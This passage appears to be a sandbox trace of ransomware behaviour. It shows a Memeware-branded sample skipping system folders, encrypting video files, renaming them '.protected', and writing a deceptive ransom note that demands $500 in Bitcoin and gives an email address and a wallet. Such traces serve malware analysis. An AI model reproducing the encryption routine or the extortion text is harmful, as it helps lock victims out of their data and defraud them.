lstrcmpiW (lpString1="ofEIt.swf", lpString2="System Volume 
Information") returned -1 [0092.898] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrIW (lpFirst="ofEIt.swf", lpSrch=".protected") returned 0x0 [0092.898] lstrcmpW (lpString1="ofEIt.swf", lpString2="RESTORE_FILES.txt") returned -1 [0092.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrW (lpFirst="ofEIt.swf", lpSrch=".txt") returned 0x0 [0092.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.898] StrStrW (lpFirst="ofEIt.swf", lpSrch=".rar") returned 0x0 [0092.899] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf") returned 64 [0092.899] StrStrW (lpFirst="ofEIt.swf", lpSrch=".zip") returned 0x0 [0092.899] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x8d9, lpOverlapped=0x0) returned 1 [0092.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffff727, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x8d9, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x8d9, lpOverlapped=0x0) returned 1 [0092.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.899] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.900] CloseHandle (hObject=0xd8) returned 1 [0092.900] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf.protected") returned 74 [0092.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\ofEIt.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\ofeit.swf.protected")) returned 1 [0092.900] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.900] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.901] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\RESTORE_FILES.txt") returned 72 [0092.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.901] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.901] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.902] lstrlenA 
(lpString="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") returned 684 [0092.902] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.902] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.902] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.902] CloseHandle (hObject=0xd4) returned 1 [0092.902] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Windows") returned -1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Program Files") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="Program Files (x86)") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="$Recycle.bin") returned 1 [0092.902] lstrcmpiW (lpString1="tyJtt8BR", lpString2="System Volume Information") returned 1 [0092.902] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR") returned 57 [0092.902] lstrcmpW (lpString1="tyJtt8BR", lpString2=".") returned 1 [0092.902] lstrcmpW (lpString1="tyJtt8BR", lpString2="..") returned 1 [0092.902] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\*") returned 59 [0092.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\*", lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.903] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\.") returned 59 [0092.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.903] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\..") returned 60 [0092.903] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.903] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.903] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Windows") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Program Files") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="Program Files (x86)") returned -1 [0092.903] lstrcmpiW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="$Recycle.bin") returned 1 [0092.903] lstrcmpiW 
(lpString1="agm2SsPgMoj1u7.mp4", lpString2="System Volume Information") returned -1 [0092.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.903] StrStrIW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".protected") returned 0x0 [0092.903] lstrcmpW (lpString1="agm2SsPgMoj1u7.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".txt") returned 0x0 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".rar") returned 0x0 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".zip") returned 0x0 [0092.904] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) 
returned 1 [0092.904] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.904] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.905] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.905] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.905] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.905] CloseHandle (hObject=0xd8) returned 1 [0092.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4.protected") returned 86 [0092.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4.protected")) returned 1 [0092.906] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Windows") returned -1 [0092.906] lstrcmpiW 
(lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Program Files") returned -1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Program Files (x86)") returned -1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="$Recycle.bin") returned 1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="System Volume Information") returned -1 [0092.906] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrIW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".protected") returned 0x0 [0092.906] lstrcmpW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.906] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".txt") returned 0x0 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".rar") returned 0x0 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".zip") returned 0x0 [0092.906] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.907] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.907] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.907] CloseHandle (hObject=0xd8) returned 1 [0092.907] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv.protected") returned 92 [0092.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv.protected")) returned 1 [0092.908] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Windows") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Program Files") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Program Files (x86)") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="$Recycle.bin") returned 1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="System Volume Information") returned -1 [0092.908] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrIW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".protected") returned 0x0 [0092.908] lstrcmpW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.908] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.908] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 
[0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".txt") returned 0x0 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".rar") returned 0x0 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".zip") returned 0x0 [0092.908] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.909] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.909] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.909] CloseHandle (hObject=0xd8) returned 1 [0092.909] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv.protected") returned 87 
[0092.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv.protected")) returned 1 [0092.910] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Windows") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Program Files") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Program Files (x86)") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="$Recycle.bin") returned 1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="System Volume Information") returned -1 [0092.910] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.910] StrStrIW (lpFirst="HNpXh8o5.mp4", lpSrch=".protected") returned 0x0 [0092.910] lstrcmpW (lpString1="HNpXh8o5.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.910] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.910] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 